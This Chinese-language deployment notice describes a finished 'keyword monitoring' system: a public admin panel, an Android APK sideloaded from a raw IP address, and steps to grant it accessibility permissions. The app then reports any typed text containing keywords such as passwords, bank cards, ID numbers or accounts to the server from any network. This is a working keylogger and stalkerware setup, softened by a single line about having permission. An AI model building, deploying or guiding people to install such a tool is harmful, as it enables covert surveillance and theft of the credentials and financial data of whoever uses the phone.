========================================
✅ 关键词监控系统 - 部署完成
========================================

🎉 所有组件已成功部署！

========================================
📊 管理后台
========================================

访问地址（任何设备都可以访问）：
http://38.49.29.167:3000

功能：
✅ 添加/删除关键词
✅ 查看实时警告通知
✅ 管理设备列表
✅ 查看统计数据

========================================
📱 Android应用下载
========================================

APK下载地址：
http://38.49.29.167:3000/关键词监控.apk

APK文件大小: 约 3-5 MB

安装步骤：
1. 用手机浏览器访问上面的链接下载APK
2. 安装APK（需允许"安装未知来源应用"）
3. 打开应用
4. 输入服务器地址: http://38.49.29.167:3000
5. 点击"保存服务器地址"
6. 点击"启用辅助功能"
7. 在系统设置中找到"关键词监控"并启用

========================================
🎯 使用方法
========================================

1. 在管理后台添加关键词
   例如：密码、银行卡、身份证、账号等

2. 手机在任何地方打字
   - 可以在家里、公司、外面用4G/5G
   - 只要能上网就能连接服务器
   - 不需要在同一个WiFi网络

3. 触发关键词后
   - 管理后台实时显示警告
   - 显示设备名称、关键词、相关文本、时间

========================================
🔧 系统管理
========================================

查看服务状态:
ps aux | grep node

停止服务:
cd /www/wwwroot/keyword-monitor && ./stop.sh

启动服务:
cd /www/wwwroot/keyword-monitor && ./start.sh

重启服务:
cd /www/wwwroot/keyword-monitor && ./stop.sh && ./start.sh

查看日志:
tail -f /tmp/keyword-monitor.log

========================================
📂 文件位置
========================================

项目根目录:
/www/wwwroot/keyword-monitor/

后端代码:
/www/wwwroot/keyword-monitor/backend/

管理后台:
/www/wwwroot/keyword-monitor/frontend/

Android源码:
/www/wwwroot/keyword-monitor/android/

APK文件:
/www/wwwroot/keyword-monitor/android/app/build/outputs/apk/debug/app-debug.apk
/www/wwwroot/keyword-monitor/frontend/关键词监控.apk (已复制到可下载位置)

数据库:
/www/wwwroot/keyword-monitor/backend/monitor.db

========================================
⚠️ 重要提示
========================================

1. 防火墙已开放3000端口
2. 手机可以在任何地方连接（不需要同一网络）
3. 请确保您有权限监控目标设备
4. 建议定期备份数据库文件
5. 如需HTTPS，需要配置SSL证书

========================================
🎊 开始使用吧！
========================================

1. 打开浏览器访问: http://38.49.29.167:3000
2. 添加关键词
3. 手机下载并安装APK: http://38.49.29.167:3000/关键词监控.apk
4. 配置服务器地址
5. 启用辅助功能
6. 完成！开始监控

有任何问题请查看:
- README.md
- 使用说明.md
- 自己编译APK教程.md

========================================








